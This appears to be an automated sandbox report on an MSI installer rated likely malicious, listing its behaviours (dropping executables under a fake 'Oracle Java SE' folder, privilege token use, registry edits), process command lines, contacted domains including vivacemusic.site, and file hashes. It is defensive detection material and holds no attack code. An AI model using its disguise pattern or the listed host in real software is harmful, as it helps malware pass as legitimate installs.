Analysis Overview
SHA256
7e657b695a46ef1719ec2f8baedbb9227b9de9591dcb66db7e99539fff1888d5
Threat Level: Likely malicious
The file 1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Command and Scripting Interpreter: PowerShell
Modifies file permissions
Blocklisted process makes network request
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Enumerates connected drives
Drops file in Windows directory
Executes dropped EXE
Loads dropped DLL
Drops file in Program Files directory
Event Triggered Execution: Installer Packages
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-07 11:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-07 11:25
Reported
2024-10-07 11:28
Platform
win7-20240903-en
Max time kernel
147s
Max time network
127s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\Installer\f778881.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f778882.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI94CD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI955A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{B787FD59-D138-4CB1-8AF7-72A4E4815245}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\f778884.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f778881.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9904.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f778882.ipi | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Loads dropped DLL
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554\ProductFeature | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductName = "Oracle Java SE" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\PackageCode = "0EBA20D468628E64F92B33D46217DF75" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Version = "134217999" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductIcon = "C:\\Windows\\Installer\\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\\Logo.ico" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\PackageName = "1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A7D9DB54E9B6F3B6630012FC7647155E
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D0B7C0D091818C344EFC99F4C0038533 M Global\MSI0000
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| GB | 2.22.249.67:80 | repository.certum.pl | tcp |
| N/A | 127.0.0.1:49427 | N/A | tcp |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| N/A | 127.0.0.1:49430 | N/A | tcp |
| N/A | 127.0.0.1:49433 | N/A | tcp |
| N/A | 127.0.0.1:49435 | N/A | tcp |
| N/A | 127.0.0.1:49438 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab84BC.tmp
| Algorithm | Digest |
| --- | --- |
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar851C.tmp
| Algorithm | Digest |
| --- | --- |
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6525274CBC2077D43D7D17A33C868C4F
| Algorithm | Digest |
| --- | --- |
| MD5 | d5e98140c51869fc462c8975620faa78 |
| SHA1 | 07e032e020b72c3f192f0628a2593a19a70f069e |
| SHA256 | 5c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e |
| SHA512 | 9bd164cc4b9ef07386762d3775c6d9528b82d4a9dc508c3040104b8d41cfec52eb0b7e6f8dc47c5021ce2fe3ca542c4ae2b54fd02d76b0eabd9724484621a105 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6525274CBC2077D43D7D17A33C868C4F
| Algorithm | Digest |
| --- | --- |
| MD5 | cac3c37653b4da0e0bf825c4af1610dd |
| SHA1 | 7ed10a295822a9ca833bf0f4fe774f862bc13d02 |
| SHA256 | 4706b22b2c654e9cf7ebfb7acb0905097d17797042f1c8ac650af149fe31895e |
| SHA512 | 0b4716b0bcf7484745fb69ec6b6bafedd9cbb82d645af3701f2ca17f03c1e76cabdfefa7e84a3df3161b36c77996741e3e8c2c77b169ee4dd10ee47fe2e01b5d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Algorithm | Digest |
| --- | --- |
| MD5 | efa9512f93d3510e0a618b0bb8521f4d |
| SHA1 | 3dc78f8aed67b3378fd650afd1f2f95965018e5a |
| SHA256 | 832d55d9e43a89da771b08be5419a967ff5ed8d1ca5601ec5e89dfba04af6e27 |
| SHA512 | 3ea622ab40bb73beca8459614626f701c286624bb691c804dab18f458c4f6f2275fa452e447c3f340d3622e719a706fe029d17a5a0621675a77a5afff4f9409f |
C:\Windows\Installer\MSI955A.tmp
| Algorithm | Digest |
| --- | --- |
| MD5 | a3ae5d86ecf38db9427359ea37a5f646 |
| SHA1 | eb4cb5ff520717038adadcc5e1ef8f7c24b27a90 |
| SHA256 | c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74 |
| SHA512 | 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0 |
\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
| Algorithm | Digest |
| --- | --- |
| MD5 | 36b24a4deb93b2af6da9dba72eefaa5f |
| SHA1 | 8c55de3fa1269f4fdba9a5c701c5daad84d59f38 |
| SHA256 | d3370bb63c1908550c49601fcc664313809fcb68fdfdb81ef8129fe465a254d2 |
| SHA512 | 572355b5ab4fd349c71aaf66d5a1232e48ee697bb96b84b6656dc6b6c64f7c8098e00772e1b519805bb441159281ec5f90ff91a20ed17597704bf2492f8fff9d |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll
| Algorithm | Digest |
| --- | --- |
| MD5 | 9dda681b0406c3575e666f52cbde4f80 |
| SHA1 | 1951c5b2c689534cdc2fbfbc14abbf9600a66086 |
| SHA256 | 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3 |
